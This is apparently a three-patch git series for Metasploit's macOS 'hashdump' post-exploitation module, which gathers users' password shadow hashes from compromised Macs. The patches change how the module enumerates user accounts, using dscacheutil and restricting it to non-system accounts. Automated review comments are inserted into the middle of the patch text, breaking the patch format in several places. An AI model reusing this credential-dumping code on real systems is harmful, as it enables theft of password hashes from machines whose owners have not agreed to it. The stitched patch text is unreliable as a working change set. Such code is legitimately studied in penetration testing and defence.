From e1ec0ec8995c250e8819e89b8354f329edd5cc5e Mon Sep 17 00:00:00 2001
From: pwnforfun <38401374+pwnforfun@users.noreply.github.com>
Date: Thu, 6 Sep 2018 12:00:36 +0200
Subject: [PATCH 1/3] hash_dump now working properly up to Mac OS X High Sierra (10.13.6 included)

---
 modules/post/osx/gather/hashdump.rb | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/modules/post/osx/gather/hashdump.rb b/modules/post/osx/gather/hashdump.rb
index 694414c958..9447ec3a20 100644
--- a/modules/post/osx/gather/hashdump.rb
+++ b/modules/post/osx/gather/hashdump.rb
@@ -8,7 +8,7 @@ require 'rexml/document'
 class MetasploitModule < Msf::Post
 
   # set of accounts to ignore while pilfering data
-  OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"]
+  #OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"]
 
   include Msf::Post::File
   include Msf::Post::OSX::Priv
@@ -203,7 +203,10 @@ class MetasploitModule < Msf::Post
 
   # @return [Array] list of user names
   def users
-    @users ||= cmd_exec("/bin/ls /Users").each_line.collect.map(&:chomp) - OSX_IGNORE_ACCOUNTS
+    tmp = cmd_exec("dscacheutil -q user").split(/$/).map(&:strip) #- OSX_IGNORE_ACCOUNTS
+    res = Array.new()
+    tmp.each_with_index{ |val, index| res << val.split("name: ")[1] if val.include?("name: ") and tmp[index+1].include?("**")}
+    res
   end
 
   # @return [String] version string (e.g. 10.8.5)

From c89d8f8fb7ef1f3ad540ed72429a482e59a98958 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Mon, 24 Sep 2018 22:17:32 -0500
Subject: [PATCH 2/3] fix user enumeration methods, be more robust

---
 lib/msf/core/post/osx/system.rb | 28 +++++++++++++++++-----------
 1 file changed, 17 insertions(+), 11 deletions(-)

diff --git a/lib/msf/core/post/osx/system.rb b/lib/msf/core/post/osx/system.rb
index 51dccf89e2..ca59a54902 100644
--- a/lib/msf/core/post/osx/system.rb
+++ b/lib/msf/core/post/osx/system.rb
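Review bot: `#OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"]` keeps the constant as commented-out code instead of removing it; its only reader, `users`, is rewritten in this patch and deleted outright in patch 3/3, so by the end of the series the line is dead. Delete that line together with the `# set of accounts to ignore while pilfering data` comment above it rather than commenting them out, so the next reader does not look for a remaining use.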
@@ -27,14 +27,15 @@ module Msf::Post::OSX::System
   def get_users
     cmd_output = cmd_exec("/usr/bin/dscacheutil -q user")
     users = []
-    users_arry = cmd_output.split("\n\n")
+    users_arry = cmd_output.tr("\r", "").split("\n\n")
     users_arry.each do |u|
       entry = Hash.new
       u.each_line do |l|
         field,val = l.chomp.split(": ")
         next if field == "password"
-        entry[field] = val.chomp
-
+        unless val.nil?
+          entry[field] = val.strip
+        end
       end
       users << entry
     end
@@ -48,15 +49,17 @@ module Msf::Post::OSX::System
   def get_system_accounts
     cmd_output = cmd_exec("/usr/bin/dscacheutil -q user")
     users = []
-    users_arry = cmd_output.split("\n\n")
+    users_arry = cmd_output.tr("\r", "").split("\n\n")
     users_arry.each do |u|
       entry = {}
       u.each_line do |l|
         field,val = l.chomp.split(": ")
         next if field == "password"
-        entry[field] = val.chomp
+        unless val.nil?
+          entry[field] = val.strip
+        end
       end
-      next if entry["name"] !~ /^_/
+      next if entry["name"][0] != '_'
       users << entry
     end
     return users
@@ -69,15 +72,17 @@ module Msf::Post::OSX::System
   def get_nonsystem_accounts
     cmd_output = cmd_exec("/usr/bin/dscacheutil -q user")
     users = []
-    users_arry = cmd_output.split("\n\n")
+    users_arry = cmd_output.tr("\r", "").split("\n\n")
     users_arry.each do |u|
       entry = {}
       u.each_line do |l|
         field,val = l.chomp.split(": ")
         next if field == "password"
-        entry[field] = val.chomp
+        unless val.nil?
+          entry[field] = val.strip
+        end
       end
-      next if entry["name"] =~ /^_/
+      next if entry["name"][0] == '_'
       users << entry
     end
     return users
@@ -96,8 +101,9 @@ module Msf::Post::OSX::System
       u.each_line do |l|
         field,val = l.chomp.split(": ")
         next if field == "password"
-        entry[field] = val.chomp
-
+        unless val.nil?
+          entry[field] = val.strip
+        end
       end
       groups << entry
     end

From 3e61a98f25f84aeb5270268b7c5cbb125b67bc7c Mon Sep 17 00:00:00 2001
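Review bot: `field,val = l.chomp.split(": ")` has no limit, so a value that itself contains `: ` is cut down to its first segment before the new `unless val.nil?` guard stores it; `field, val = l.chomp.split(": ", 2)` keeps the whole value and still yields nil for a line without a separator. The same line appears in the get_system_accounts and get_nonsystem_accounts hunks and in the fourth hunk (the one ending in `groups << entry`), so the change applies to all four. The get_users body continues past the end of this hunk, and the method enclosing the fourth hunk begins before it.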
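Review bot: `next if entry["name"][0] != '_'` raises NoMethodError when a parsed record has no `name` line, because `entry["name"]` is then nil; the regex form it replaces treated nil as a non-match and simply skipped such a record. `next unless entry["name"]&.start_with?('_')` preserves that behaviour here, and the get_nonsystem_accounts hunk needs the mirror form `next if entry["name"]&.start_with?('_')`, which likewise keeps a nameless record rather than crashing. Each method's closing end lies outside its hunk.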
From: Brent Cook
Date: Mon, 24 Sep 2018 22:17:58 -0500
Subject: [PATCH 3/3] use non-system users for hashdump

---
 modules/post/osx/gather/hashdump.rb | 14 ++++----------
 1 file changed, 4 insertions(+), 10 deletions(-)

diff --git a/modules/post/osx/gather/hashdump.rb b/modules/post/osx/gather/hashdump.rb
index 9447ec3a20..e4ef62c25a 100644
--- a/modules/post/osx/gather/hashdump.rb
+++ b/modules/post/osx/gather/hashdump.rb
@@ -12,6 +12,7 @@ class MetasploitModule < Msf::Post
 
   include Msf::Post::File
   include Msf::Post::OSX::Priv
+  include Msf::Post::OSX::System
   include Msf::Auxiliary::Report
 
   def initialize(info={})
@@ -44,7 +45,8 @@ class MetasploitModule < Msf::Post
     end
 
     # iterate over all users
-    users.each do |user|
+    get_nonsystem_accounts.each do |user_info|
+      user = user_info['name']
       next if datastore['MATCHUSER'].present? and datastore['MATCHUSER'] !~ user
       print_status "Attempting to grab shadow for user #{user}..."
       if gt_lion? # 10.8+
@@ -201,16 +203,8 @@ class MetasploitModule < Msf::Post
     shadow_bytes.sub!(/^dsAttrTypeNative:ShadowHashData:/, '')
   end
 
-  # @return [Array] list of user names
-  def users
-    tmp = cmd_exec("dscacheutil -q user").split(/$/).map(&:strip) #- OSX_IGNORE_ACCOUNTS
-    res = Array.new()
-    tmp.each_with_index{ |val, index| res << val.split("name: ")[1] if val.include?("name: ") and tmp[index+1].include?("**")}
-    res
-  end
-
   # @return [String] version string (e.g. 10.8.5)
   def ver_num
-    @version ||= cmd_exec("/usr/bin/sw_vers -productVersion").chomp
+    @product_version ||= get_sysinfo['ProductVersion']
   end
 end
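Review bot: `user = user_info['name']` is used unchecked, and a record that get_nonsystem_accounts parsed without a `name` line arrives here as nil, which then flows into the print_status message and presumably into the shadow lookup further down the loop; add `next unless user` directly after the assignment so a malformed record is skipped rather than acted on. The loop body continues past the end of the hunk.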
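Review bot: `@product_version ||= get_sysinfo['ProductVersion']` does not memoize a missing value, so if get_sysinfo (defined outside this hunk) returns a hash without that key, every call to ver_num re-runs the lookup and returns nil, which the callers comparing version strings may not expect; `return @product_version if defined?(@product_version)` before the assignment, or `@product_version ||= get_sysinfo.fetch('ProductVersion')` to fail loudly, would make the behaviour explicit. The `# @return [String] version string (e.g. 10.8.5)` doc comment could also note that the value now comes from get_sysinfo rather than a direct sw_vers call.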